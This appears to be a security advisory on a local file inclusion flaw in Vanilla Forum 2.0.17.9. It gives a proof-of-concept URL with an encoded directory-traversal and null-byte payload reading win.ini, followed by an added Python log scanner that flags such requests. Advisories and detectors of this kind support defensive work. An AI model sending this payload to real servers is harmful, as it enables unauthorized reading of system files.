Vanilla Forum 2.0.17.9 LFI Vulnerability

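------------------------------------------------------------------------
Software..............Vanilla Forum 2.0.17.9
Vulnerability.........Local File Inclusion
Threat Level..........Critical (4/5)
Download..............http://www.vanillaforums.com/
Discovery Date........5/15/2011
Tested On.............Windows Vista + XAMPP
------------------------------------------------------------------------
Author................AutoSec Tools
Site..................http://www.autosectools.com/
Email.................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
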
--Description--

A local file inclusion vulnerability in Vanilla Forum 2.0.17.9 can be
exploited to include arbitrary files.

--PoC--

  

http://localhost/vanilla/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
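
Added example (not part of the original advisory): a log scan that flags requests shaped like the PoC, where the `p` parameter contains `..` path segments or a null byte once percent-decoding is undone. The sample log lines, the combined-log layout and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines for illustration (not captured traffic).
SAMPLE_LOG = [
    '127.0.0.1 - - [15/May/2011:10:00:01 +0000] "GET /vanilla/index.php?p=/discussions HTTP/1.1" 200 5120',
    '127.0.0.1 - - [15/May/2011:10:00:02 +0000] "GET /vanilla/index.php?p=..%5c..%5c..%5cwindows%5cwin.ini%00 HTTP/1.1" 200 477',
    '127.0.0.1 - - [15/May/2011:10:00:03 +0000] "GET /vanilla/index.php?p=..%255c..%255cwindows%255cwin.ini HTTP/1.1" 404 312',
    '127.0.0.1 - - [15/May/2011:10:00:04 +0000] "GET /vanilla/index.php?p=/profile/1/j..doe HTTP/1.1" 200 2048',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%255c) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_route(raw_value):
    """Return the reasons a raw `p` value looks like path traversal."""
    value = fully_decode(raw_value)
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    # Backslash counts as a separator: Windows hosts accept both forms.
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("dot-dot-segment")
    return reasons

def scan(lines, param="p"):
    """Return [(line_number, reasons)] for lines whose `param` is suspicious."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # Split the raw query by hand so decoding stays under our control.
        for pair in urlsplit(match.group(1)).query.split("&"):
            name, _, raw = pair.partition("=")
            reasons = inspect_route(raw) if name == param else []
            if reasons:
                hits.append((number, reasons))
    return hits

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

Matching on whole `..` segments rather than the substring keeps values such as `j..doe` from being flagged.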

 

 
